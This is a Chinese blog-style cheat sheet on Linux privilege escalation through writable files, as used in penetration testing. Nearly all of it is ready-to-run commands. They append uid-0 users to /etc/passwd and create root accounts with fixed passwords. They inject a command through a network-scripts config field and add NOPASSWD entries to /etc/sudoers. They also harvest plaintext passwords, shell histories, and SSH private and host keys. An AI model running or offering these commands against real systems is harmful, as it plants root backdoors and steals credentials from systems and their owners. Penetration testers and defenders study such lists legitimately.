WEB渗透Linux提权篇-可写文件提权
往期文章
WEB渗透Linux提权篇-环境变量提权-CSDN博客
WEB渗透Linux提权篇-提权工具合集-CSDN博客
用到的工具:windows、Linux、Mac提权脚本整理:夸克网盘分享
列出系统中可写文件
>find / -writable ! -user `whoami` -type f ! -path "/proc/*" ! -path "/sys/*" -exec ls -al {} \; 2>/dev/null
>find / -perm -2 -type f 2>/dev/null
>find / ! -path "*/proc/*" -perm -2 -type f -print 2>/dev/null
passwd文件
$ls –lh /etc/passwd 若是任何用户可读写
$perl -le 'print crypt("password@123","addedsalt")' 生成密码或php -r "print(crypt('aarti','123') . \"\n\");"或python -c 'import crypt; print crypt.crypt("pass", "$6$salt")'
$echo "test:advwtv/9yU5yQ:0:0:User_like_root:/root:/bin/bash" >>/etc/passwd
一条命令添加root用户
>useradd -p `openssl passwd -1 -salt 'user' 123qwe` -u 0 -o -g root -G root -s /bin/bash -d /home/user venus
用户名venus 密码123qwe
>useradd newuser;echo "newuser:password"|chpasswd
>echo "admin:x:0:0::/:/bin/sh" >> /etc/passwd
>passwd admin修改密码
或
>useradd newuser;echo "newuser:password"|chpasswd
>useradd -p `openssl passwd 123456` guest
>useradd -p "$(openssl passwd 123456)" guest
>useradd newuwer;echo -e "123456\n123456\n" |passwd newuser
/etc/sysconfig/network-scripts/
NAME=Network /bin/id <= 注意空格
ONBOOT=yes
DEVICE=eth0
EXEC :
./etc/sysconfig/network-scripts/ifcfg-1337
sudoers
echo "username ALL=(ALL:ALL) ALL">>/etc/sudoers
无需密码使用sudo
echo "username ALL=(ALL) NOPASSWD: ALL" >>/etc/sudoers
echo "username ALL=NOPASSWD: /bin/bash" >>/etc/sudoers
查找纯文本用户名和密码
>grep -i user [filename]
>grep -i pass [filename]
>grep -C 5 "password" [filename]
>find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password" # Joomla
>cat ~/.bash_history
>cat ~/.nano_history
>cat ~/.atftp_history
>cat ~/.mysql_history
>cat ~/.php_history
>grep --color=auto -rnw '/' -ie "PASSWORD" --color=always 2> /dev/null
>find . -type f -exec grep -i -I "PASSWORD" {} /dev/null \;
尝试查找私钥
>cat ~/.ssh/authorized_keys
>cat ~/.ssh/identity.pub
>cat ~/.ssh/identity
>cat ~/.ssh/id_rsa.pub
>cat ~/.ssh/id_rsa
>cat ~/.ssh/id_dsa.pub
>cat ~/.ssh/id_dsa
>cat /etc/ssh/ssh_config
>cat /etc/ssh/sshd_config
>cat /etc/ssh/ssh_host_dsa_key.pub
>cat /etc/ssh/ssh_host_dsa_key
>cat /etc/ssh/ssh_host_rsa_key.pub
>cat /etc/ssh/ssh_host_rsa_key
>cat /etc/ssh/ssh_host_key.pub
>cat /etc/ssh/ssh_host_key